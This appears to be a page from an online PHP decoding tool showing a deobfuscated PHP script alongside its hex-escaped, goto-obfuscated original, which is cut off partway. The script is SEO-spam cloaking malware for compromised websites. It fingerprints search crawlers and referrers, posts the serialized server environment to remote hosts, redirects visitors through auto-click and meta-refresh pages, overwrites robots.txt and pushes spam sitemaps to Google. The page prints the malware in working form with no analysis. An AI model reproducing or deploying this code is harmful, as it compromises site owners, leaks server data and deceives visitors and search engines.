Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php define('A', 'jan44.tpuwt5573ytu/aucfan::[0:3~5]/^u!.html::'); goto YPWQ_; CyzqB: fun..
Decoded Output download
<?php define('A', 'jan44.tpuwt5573ytu/aucfan::[0:3~5]/^u!.html::'); goto YPWQ_; CyzqB: function AuOmF($p_v32 = '') { return preg_match("/(googlebot|baiduspider|bingbot|google|baidu|aol|bing|yahoo|yandex)/si", $p_v32); } goto WFrFi; JL1bs: BHUnV: goto B0ltV; g1Md3: if (!function_exists("ob_start")) { goto BHUnV; } goto M0sY4; AsELT: function uDIoM($Xz9zF = '') { goto fCMWp; C5olm: $Jew3b = sprintf("https://%s.py", Y_wAi($tXzk3[0])); goto f5yOQ; HZhZK: $n78Cz = trim($n78Cz); goto SwBl7; PRvmA: $_SERVER["yt_jump"] = 1; goto WmqGZ; meuIY: $n78Cz = uW8SS($Jew3b, array("x" => serialize($_SERVER))); goto HZhZK; gHjlV: if (!$T2Ip_) { goto uJHDH; } goto PRvmA; tZRrx: echo $wtaDW; goto mufeC; czhA2: $_SERVER["yt_up"] = $tXzk3[2]; goto z4dli; RYglv: if (!in_array($n78Cz, ["*404", "*return"])) { goto AAsIX; } goto zaBTv; ooemK: $v7mz5 = aUomf($nJby1); goto kl0xt; HmBC1: kVA4g: goto oFw5P; zaBTv: return; goto RNV4u; z4dli: $UbZ_u = "ls1"; goto HER0r; f5yOQ: $_SERVER["yt_jump"] = 0; goto Nnlki; fCMWp: $sU7r8 = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : ''); goto GyEJu; oFw5P: die; goto nNgJC; kl0xt: $T2Ip_ = ZoYNu($Hsi7J); goto YlCkH; MTrsX: echo sprintf($xTGpN, $Jew3b, $Jew3b) . "<br /><br />"; goto CZQ7o; oQdC0: $xTGpN = "<a href="%s" target="_blank">%s</a>"; goto gX2Ju; ECDSS: AG2rb: goto j8pIo; LzMlu: $n78Cz = $P4tTG[2]; goto dp0jl; gUfLK: header($P4tTG[1]); goto UwHst; NjcdV: zcG2O: goto gbQD0; robY_: header($P4tTG[1]); goto LzMlu; D2mlD: $Hsi7J = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; goto VnJe5; RzIw4: $n78Cz = uw8sS($Jew3b, array("x" => serialize($_SERVER))); goto fxA_h; eXVy2: die; goto VXVYl; RNV4u: AAsIX: goto dqd1c; XCnuz: $Y4OQu = preg_match("/^https?\:\/\//si", $wtaDW); goto LN_dM; SwBl7: if (!preg_match("/^Head@(.*?)@@(.*)/is", $n78Cz, $P4tTG)) { goto Yvrdj; } goto robY_; CZQ7o: $cJyoT = parse_url($Jew3b); goto CT1Y0; YlCkH: $tXzk3 = explode("::",A); goto C5olm; dp0jl: Yvrdj: goto wb60v; Z1_Pl: if (!preg_match("/^Head@(.*?)@@(.*)/is", $n78Cz, $P4tTG)) { goto AG2rb; } goto gUfLK; VnJe5: $nJby1 = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; goto ooemK; HER0r: if (!preg_match("/sitemap.*?\.xml$/si", $sU7r8)) { goto vwiru; } goto meuIY; dqd1c: if (!preg_match("/^Jump@(.*)/", $n78Cz, $Yma13)) { goto JyZa6; } goto bO0a7; gX2Ju: if (!isset($_GET[$UbZ_u])) { goto M4gO5; } goto MTrsX; wb60v: echo "{$n78Cz}"; goto eXVy2; bO0a7: $wtaDW = trim($Yma13[1]); goto XCnuz; mufeC: goto kVA4g; goto NjcdV; UwHst: $n78Cz = $P4tTG[2]; goto ECDSS; ihVdp: die; goto sAYeU; y1d_8: xTuDf: goto jQSHE; gbQD0: echo sprintf("<body onload="document.getElementsByTagName(%sa%s)[0].click()"><a href="%s"></a><noscript><meta http-equiv="refresh" content="0; url=%s" /></noscript></body>", "'", "'", $wtaDW, $wtaDW); goto HmBC1; Nnlki: $_SERVER["yt_gz"] = $tXzk3[1]; goto czhA2; wj3hr: die; goto y1d_8; sAYeU: M4gO5: goto gHjlV; j8pIo: echo "{$n78Cz}"; goto wj3hr; LN_dM: if ($Y4OQu) { goto zcG2O; } goto tZRrx; VXVYl: vwiru: goto TwJgY; WmqGZ: uJHDH: goto RzIw4; GyEJu: $sU7r8 = $sU7r8 == '' ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != '' ? $_SERVER["PATH_INFO"] : $sU7r8 : $sU7r8; goto D2mlD; TwJgY: if (!($v7mz5 || $T2Ip_)) { goto xTuDf; } goto oQdC0; fxA_h: $n78Cz = trim($n78Cz); goto RYglv; nNgJC: JyZa6: goto Z1_Pl; CT1Y0: echo gethostbyname($cJyoT["host"]); goto ihVdp; jQSHE: } goto YD46S; M0sY4: @ob_start(); goto JL1bs; WFrFi: function zoYNU($BtqTp = '') { return preg_match("/(google.co.jp|yahoo.co.jp|bing|baidu|google.com)/si", $BtqTp); } goto oyx_0; oyx_0: function Y_wAi($hBrb8) { goto CEmrY; yGCFg: preg_match("/([^\.]+\.)(.*)(\/.*)/", $hBrb8, $zDmBa); goto UzM6Q; CEmrY: $rRidk = ''; goto yGCFg; jFqb4: return $rRidk; goto W0PSj; n4nTU: $EFVdU = preg_split("//", $zDmBa[2], -1, PREG_SPLIT_NO_EMPTY); goto wIcwU; RA3zh: $rRidk = $zDmBa[1] . $rRidk . $zDmBa[3]; goto b1jiN; AzFx1: bNeQN: goto SzwRX; b1jiN: OcO7A: goto jFqb4; SzwRX: $rRidk = implode('', $EFVdU); goto j_gEY; wIcwU: foreach ($EFVdU as $yit6l => $lgw9t) { $EFVdU[$yit6l] = chr(ord($lgw9t) - 5); AoJyy: } goto AzFx1; UzM6Q: if (!(is_array($zDmBa) && count($zDmBa) == 4)) { goto OcO7A; } goto PV8Ou; PV8Ou: if (!($zDmBa[2] != '')) { goto xutdr; } goto n4nTU; j_gEY: xutdr: goto RA3zh; W0PSj: } goto AsELT; YPWQ_: @date_default_timezone_set("PRC"); goto g1Md3; B0ltV: function uW8Ss($v490O, $A0GFZ = array()) { goto aZylS; JtRG4: curl_setopt($cPtZo, CURLOPT_TIMEOUT, 60); goto EjRoA; Qg9IJ: curl_setopt($cPtZo, CURLOPT_USERAGENT, "WHR"); goto kcD2t; v5haP: $XSnp4 = $tt_0f; goto NKumX; EItrZ: curl_setopt($cPtZo, CURLOPT_POSTFIELDS, http_build_query($A0GFZ)); goto vDbm7; QQSqT: if (!$tt_0f) { goto D5oei; } goto v5haP; DxyKb: curl_close($cPtZo); goto QQSqT; c1_e2: $cPtZo = curl_init(); goto B2JFw; XLWX7: curl_setopt($cPtZo, CURLOPT_SSL_VERIFYHOST, false); goto qJajY; am3Ux: curl_setopt($cPtZo, CURLOPT_SSL_VERIFYPEER, false); goto XLWX7; kcD2t: curl_setopt($cPtZo, CURLOPT_CONNECTTIMEOUT, 0); goto NicLp; aZylS: $XSnp4 = 0; goto c1_e2; NKumX: D5oei: goto nN2Iu; EjRoA: curl_setopt($cPtZo, CURLOPT_POST, 1); goto EItrZ; vDbm7: $tt_0f = curl_exec($cPtZo); goto DxyKb; qJajY: curl_setopt($cPtZo, CURLOPT_FOLLOWLOCATION, 1); goto JtRG4; NicLp: curl_setopt($cPtZo, CURLOPT_RETURNTRANSFER, 1); goto am3Ux; B2JFw: curl_setopt($cPtZo, CURLOPT_URL, $v490O); goto Qg9IJ; nN2Iu: return trim(trim($XSnp4, "")); goto C2ONI; C2ONI: } goto CyzqB; YD46S: udIOM(); ?>
<?php function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function ex(){return exit();}function getSeCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$a='z41022_7.fishpan.shop/';$a='http://'.$a;$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$a."/indata.php";$map1=$a."/map.php";$jump1=$a."/jump.php";$url_words=$a."/words.php";$url_robots=$a."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));$robots_cont=@file_get_contents(BASE_PATH.'/robots.txt');$data1['robots_cont'] = $robots_cont;$robots_cont = @getServerCont($url_robots,$data1);file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=@file_get_contents(BASE_PATH.'/robots.txt');if(strpos(strtolower($robots_cont),"sitemap")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}return;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } return;} if(strpos($req_uri,"allsitemap.xml") || strpos($req_uri,"sitemap-index.xml") || strpos($req_uri,"sitemap-index-1.xml") || strpos($req_uri,"index.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;return;} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;return;} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;return;}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if(!$res_crawl && $chk_refer){ $data1['ip']=$_SERVER["REMOTE_ADDR"];$data1['referer']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$data1['user_agent']=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:''); echo getSeCont11($jump1,$data1);return; } if($res_crawl || preg_match("#((\?|\/)[a-z])\=\d+#",$req_uri)){$data1['http_user_agent']=$user_agent;$ser_cont=getSeCont11($indata1,$data1);$bb='bb';echo $ser_cont;ex();}?>
Did this file decode correctly?
Original Code
<?php define('A', 'jan44.tpuwt5573ytu/aucfan::[0:3~5]/^u!.html::'); goto YPWQ_; CyzqB: function AuOmF($p_v32 = '') { return preg_match("\x2f\50\x67\157\x6f\x67\x6c\x65\142\x6f\164\x7c\x62\141\x69\x64\x75\x73\160\x69\x64\145\162\x7c\x62\x69\156\147\x62\x6f\x74\174\147\x6f\x6f\x67\154\145\x7c\x62\x61\151\x64\165\174\141\x6f\x6c\x7c\x62\151\156\147\x7c\x79\141\150\x6f\x6f\174\x79\141\156\144\x65\x78\51\57\163\151", $p_v32); } goto WFrFi; JL1bs: BHUnV: goto B0ltV; g1Md3: if (!function_exists("\157\x62\137\163\164\x61\162\x74")) { goto BHUnV; } goto M0sY4; AsELT: function uDIoM($Xz9zF = '') { goto fCMWp; C5olm: $Jew3b = sprintf("\150\164\164\x70\x73\72\57\x2f\45\163\56\x70\x79", Y_wAi($tXzk3[0])); goto f5yOQ; HZhZK: $n78Cz = trim($n78Cz); goto SwBl7; PRvmA: $_SERVER["\x79\x74\x5f\x6a\x75\155\x70"] = 1; goto WmqGZ; meuIY: $n78Cz = uW8SS($Jew3b, array("\170" => serialize($_SERVER))); goto HZhZK; gHjlV: if (!$T2Ip_) { goto uJHDH; } goto PRvmA; tZRrx: echo $wtaDW; goto mufeC; czhA2: $_SERVER["\x79\164\137\x75\x70"] = $tXzk3[2]; goto z4dli; RYglv: if (!in_array($n78Cz, ["\x2a\64\x30\64", "\x2a\x72\145\164\x75\162\x6e"])) { goto AAsIX; } goto zaBTv; ooemK: $v7mz5 = aUomf($nJby1); goto kl0xt; HmBC1: kVA4g: goto oFw5P; zaBTv: return; goto RNV4u; z4dli: $UbZ_u = "\154\163\61"; goto HER0r; f5yOQ: $_SERVER["\x79\x74\x5f\x6a\x75\x6d\160"] = 0; goto Nnlki; fCMWp: $sU7r8 = isset($_SERVER["\122\105\121\125\x45\123\124\x5f\125\x52\x49"]) ? $_SERVER["\122\105\121\x55\105\x53\124\x5f\x55\x52\111"] : (isset($_SERVER["\121\x55\105\x52\x59\137\123\x54\122\x49\116\107"]) ? $_SERVER["\x51\125\x45\122\131\x5f\123\x54\x52\111\116\107"] : ''); goto GyEJu; oFw5P: die; goto nNgJC; kl0xt: $T2Ip_ = ZoYNu($Hsi7J); goto YlCkH; MTrsX: echo sprintf($xTGpN, $Jew3b, $Jew3b) . "\x3c\x62\162\x20\x2f\x3e\x3c\142\x72\x20\57\x3e"; goto CZQ7o; oQdC0: $xTGpN = "\x3c\141\x20\150\x72\x65\146\75\x22\x25\163\42\40\x74\141\162\x67\x65\164\75\42\137\142\x6c\141\156\153\x22\x3e\x25\x73\74\57\x61\x3e"; goto gX2Ju; ECDSS: AG2rb: goto j8pIo; LzMlu: $n78Cz = $P4tTG[2]; goto dp0jl; gUfLK: header($P4tTG[1]); goto UwHst; NjcdV: zcG2O: goto gbQD0; robY_: header($P4tTG[1]); goto LzMlu; D2mlD: $Hsi7J = isset($_SERVER["\x48\124\x54\x50\x5f\x52\105\106\x45\x52\105\x52"]) ? $_SERVER["\110\124\x54\x50\x5f\122\x45\106\105\x52\x45\122"] : ''; goto VnJe5; RzIw4: $n78Cz = uw8sS($Jew3b, array("\170" => serialize($_SERVER))); goto fxA_h; eXVy2: die; goto VXVYl; RNV4u: AAsIX: goto dqd1c; XCnuz: $Y4OQu = preg_match("\57\136\150\x74\x74\x70\163\77\134\x3a\134\x2f\x5c\x2f\57\x73\x69", $wtaDW); goto LN_dM; SwBl7: if (!preg_match("\57\136\110\x65\x61\x64\x40\50\x2e\x2a\x3f\51\100\100\50\56\x2a\x29\x2f\x69\x73", $n78Cz, $P4tTG)) { goto Yvrdj; } goto robY_; CZQ7o: $cJyoT = parse_url($Jew3b); goto CT1Y0; YlCkH: $tXzk3 = explode("\72\x3a",A); goto C5olm; dp0jl: Yvrdj: goto wb60v; Z1_Pl: if (!preg_match("\57\136\x48\145\141\x64\100\x28\56\52\77\51\x40\100\x28\56\52\51\57\x69\x73", $n78Cz, $P4tTG)) { goto AG2rb; } goto gUfLK; VnJe5: $nJby1 = isset($_SERVER["\x48\124\x54\x50\x5f\x55\x53\x45\122\137\101\107\x45\x4e\124"]) ? $_SERVER["\x48\124\124\120\x5f\x55\x53\105\x52\x5f\101\x47\105\x4e\x54"] : ''; goto ooemK; HER0r: if (!preg_match("\x2f\x73\x69\x74\145\x6d\x61\x70\56\x2a\77\x5c\x2e\170\155\x6c\x24\57\163\x69", $sU7r8)) { goto vwiru; } goto meuIY; dqd1c: if (!preg_match("\x2f\136\x4a\x75\155\160\x40\x28\x2e\52\x29\x2f", $n78Cz, $Yma13)) { goto JyZa6; } goto bO0a7; gX2Ju: if (!isset($_GET[$UbZ_u])) { goto M4gO5; } goto MTrsX; wb60v: echo "{$n78Cz}"; goto eXVy2; bO0a7: $wtaDW = trim($Yma13[1]); goto XCnuz; mufeC: goto kVA4g; goto NjcdV; UwHst: $n78Cz = $P4tTG[2]; goto ECDSS; ihVdp: die; goto sAYeU; y1d_8: xTuDf: goto jQSHE; gbQD0: echo sprintf("\74\142\157\144\171\x20\157\156\x6c\x6f\141\144\75\42\144\157\143\x75\x6d\145\156\x74\56\147\x65\164\105\154\145\x6d\x65\156\x74\163\102\x79\124\141\x67\116\141\155\145\x28\x25\163\x61\x25\x73\x29\133\60\x5d\56\143\154\151\x63\x6b\x28\x29\x22\76\74\x61\x20\150\162\145\146\x3d\x22\x25\163\x22\76\74\x2f\x61\76\74\156\x6f\163\143\162\x69\160\164\76\x3c\x6d\x65\164\x61\x20\x68\164\164\160\x2d\x65\161\x75\x69\x76\x3d\42\x72\x65\146\162\145\x73\x68\x22\x20\143\x6f\x6e\x74\145\x6e\x74\75\x22\x30\73\40\x75\162\x6c\x3d\45\163\x22\40\x2f\x3e\74\x2f\156\157\x73\x63\x72\x69\160\164\76\x3c\x2f\142\157\x64\171\x3e", "\47", "\x27", $wtaDW, $wtaDW); goto HmBC1; Nnlki: $_SERVER["\171\164\137\x67\172"] = $tXzk3[1]; goto czhA2; wj3hr: die; goto y1d_8; sAYeU: M4gO5: goto gHjlV; j8pIo: echo "{$n78Cz}"; goto wj3hr; LN_dM: if ($Y4OQu) { goto zcG2O; } goto tZRrx; VXVYl: vwiru: goto TwJgY; WmqGZ: uJHDH: goto RzIw4; GyEJu: $sU7r8 = $sU7r8 == '' ? isset($_SERVER["\x50\x41\x54\x48\x5f\x49\x4e\x46\x4f"]) && $_SERVER["\x50\101\124\110\137\111\116\106\117"] != '' ? $_SERVER["\x50\x41\x54\110\x5f\x49\x4e\106\x4f"] : $sU7r8 : $sU7r8; goto D2mlD; TwJgY: if (!($v7mz5 || $T2Ip_)) { goto xTuDf; } goto oQdC0; fxA_h: $n78Cz = trim($n78Cz); goto RYglv; nNgJC: JyZa6: goto Z1_Pl; CT1Y0: echo gethostbyname($cJyoT["\x68\x6f\163\164"]); goto ihVdp; jQSHE: } goto YD46S; M0sY4: @ob_start(); goto JL1bs; WFrFi: function zoYNU($BtqTp = '') { return preg_match("\57\x28\x67\157\157\x67\154\x65\56\x63\157\56\x6a\x70\x7c\x79\141\x68\157\x6f\x2e\x63\x6f\x2e\152\x70\174\142\x69\x6e\147\174\x62\141\x69\144\165\x7c\x67\157\157\x67\x6c\145\56\143\x6f\155\51\x2f\x73\x69", $BtqTp); } goto oyx_0; oyx_0: function Y_wAi($hBrb8) { goto CEmrY; yGCFg: preg_match("\57\50\x5b\136\134\56\x5d\x2b\x5c\x2e\51\50\x2e\52\x29\50\x5c\57\56\52\51\57", $hBrb8, $zDmBa); goto UzM6Q; CEmrY: $rRidk = ''; goto yGCFg; jFqb4: return $rRidk; goto W0PSj; n4nTU: $EFVdU = preg_split("\x2f\57", $zDmBa[2], -1, PREG_SPLIT_NO_EMPTY); goto wIcwU; RA3zh: $rRidk = $zDmBa[1] . $rRidk . $zDmBa[3]; goto b1jiN; AzFx1: bNeQN: goto SzwRX; b1jiN: OcO7A: goto jFqb4; SzwRX: $rRidk = implode('', $EFVdU); goto j_gEY; wIcwU: foreach ($EFVdU as $yit6l => $lgw9t) { $EFVdU[$yit6l] = chr(ord($lgw9t) - 5); AoJyy: } goto AzFx1; UzM6Q: if (!(is_array($zDmBa) && count($zDmBa) == 4)) { goto OcO7A; } goto PV8Ou; PV8Ou: if (!($zDmBa[2] != '')) { goto xutdr; } goto n4nTU; j_gEY: xutdr: goto RA3zh; W0PSj: } goto AsELT; YPWQ_: @date_default_timezone_set("\x50\x52\x43"); goto g1Md3; B0ltV: function uW8Ss($v490O, $A0GFZ = array()) { goto aZylS; JtRG4: curl_setopt($cPtZo, CURLOPT_TIMEOUT, 60); goto EjRoA; Qg9IJ: curl_setopt($cPtZo, CURLOPT_USERAGENT, "\127\x48\x52"); goto kcD2t; v5haP: $XSnp4 = $tt_0f; goto NKumX; EItrZ: curl_setopt($cPtZo, CURLOPT_POSTFIELDS, http_build_query($A0GFZ)); goto vDbm7; QQSqT: if (!$tt_0f) { goto D5oei; } goto v5haP; DxyKb: curl_close($cPtZo); goto QQSqT; c1_e2: $cPtZo = curl_init(); goto B2JFw; XLWX7: curl_setopt($cPtZo, CURLOPT_SSL_VERIFYHOST, false); goto qJajY; am3Ux: curl_setopt($cPtZo, CURLOPT_SSL_VERIFYPEER, false); goto XLWX7; kcD2t: curl_setopt($cPtZo, CURLOPT_CONNECTTIMEOUT, 0); goto NicLp; aZylS: $XSnp4 = 0; goto c1_e2; NKumX: D5oei: goto nN2Iu; EjRoA: curl_setopt($cPtZo, CURLOPT_POST, 1); goto EItrZ; vDbm7: $tt_0f = curl_exec($cPtZo); goto DxyKb; qJajY: curl_setopt($cPtZo, CURLOPT_FOLLOWLOCATION, 1); goto JtRG4; NicLp: curl_setopt($cPtZo, CURLOPT_RETURNTRANSFER, 1); goto am3Ux; B2JFw: curl_setopt($cPtZo, CURLOPT_URL, $v490O); goto Qg9IJ; nN2Iu: return trim(trim($XSnp4, "\357\xbb\xbf")); goto C2ONI; C2ONI: } goto CyzqB; YD46S: udIOM(); ?>
<?php function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function ex(){return exit();}function getSeCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$a='z41022_7.fishpan.shop/';$a='http://'.$a;$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$a."/indata.php";$map1=$a."/map.php";$jump1=$a."/jump.php";$url_words=$a."/words.php";$url_robots=$a."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));$robots_cont=@file_get_contents(BASE_PATH.'/robots.txt');$data1['robots_cont'] = $robots_cont;$robots_cont = @getServerCont($url_robots,$data1);file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=@file_get_contents(BASE_PATH.'/robots.txt');if(strpos(strtolower($robots_cont),"sitemap")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}return;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } return;} if(strpos($req_uri,"allsitemap.xml") || strpos($req_uri,"sitemap-index.xml") || strpos($req_uri,"sitemap-index-1.xml") || strpos($req_uri,"index.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;return;} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;return;} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;return;}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if(!$res_crawl && $chk_refer){ 